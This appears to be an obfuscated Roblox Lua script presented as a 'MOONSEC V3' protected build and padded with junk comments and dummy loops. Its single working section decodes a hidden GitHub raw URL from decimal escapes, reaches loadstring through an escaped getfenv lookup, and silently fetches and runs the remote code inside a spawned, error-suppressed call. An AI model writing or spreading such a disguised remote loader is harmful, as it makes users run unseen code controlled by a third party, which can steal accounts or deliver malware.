-- [[ MOONSEC V3 PISIT_PREMIUM_PROTECTION_ACTIVE ]] --
-- [[ BUILD_ID: 0x88F2-9910-AAFC ]] --
-- [[ WARNING: ILLEGAL ACCESS DETECTED WILL BE LOGGED ]] --

local _0x1 = 0xABC; local _0x2 = 0xDEF; local _0x3 = _0x1 + _0x2;
-- $$$--$(_+__!jdbdodjdbdkd_$$$--$(_+__!jdbdodjdbdkd
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- $$$--$(_+__!jdbdodjdbdkd_$$$--$(_+__!jdbdodjdbdkd
-- ##################################################

-- [[ JUNK_SECTION_START ]] --
local a1,a2,a3,a4,a5 = 1,2,3,4,5
local b1,b2,b3,b4,b5 = "\97","\98","\99","\100","\101"
for i=1, 50 do local _d = i * 0x2 end

-- ##################################################
-- [[ SYSTEM_CORE_INJECTION ]] --
local _0xPisit_Base = "\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\113\113\101\50\50\52\54\50\45\111\112\115\47\90\88\84\65\116\97\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\90\88\84\97\116\79\79"
local _0xMethod = getfenv()["\108\111\97\100\115\116\114\105\110\103"]

task.spawn(function()
    pcall(function()
        _0xMethod(game:HttpGet(_0xPisit_Base, true))()
    end)
end)
-- ##################################################

-- [[ JUNK_SECTION_CONTINUE ]] --
-- ##################################################
-- $$$--$(_+__!jdbdodjdbdkd
-- ##################################################
-- $$$--$(_+__!jdbdodjdbdkd
-- ##################################################
-- $$$--$(_+__!jdbdodjdbdkd
-- ##################################################
-- ##################################################
-- $$$--$(_+__!jdbdodjdbdkd
-- ##################################################
-- $$$--$(_+__!jdbdodjdbdkd
-- ##################################################
-- $$$--$(_+__!jdbdodjdbdkd
-- ##################################################

for i=1,100 do local _0xT = i * math.random() end

-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
-- ##################################################
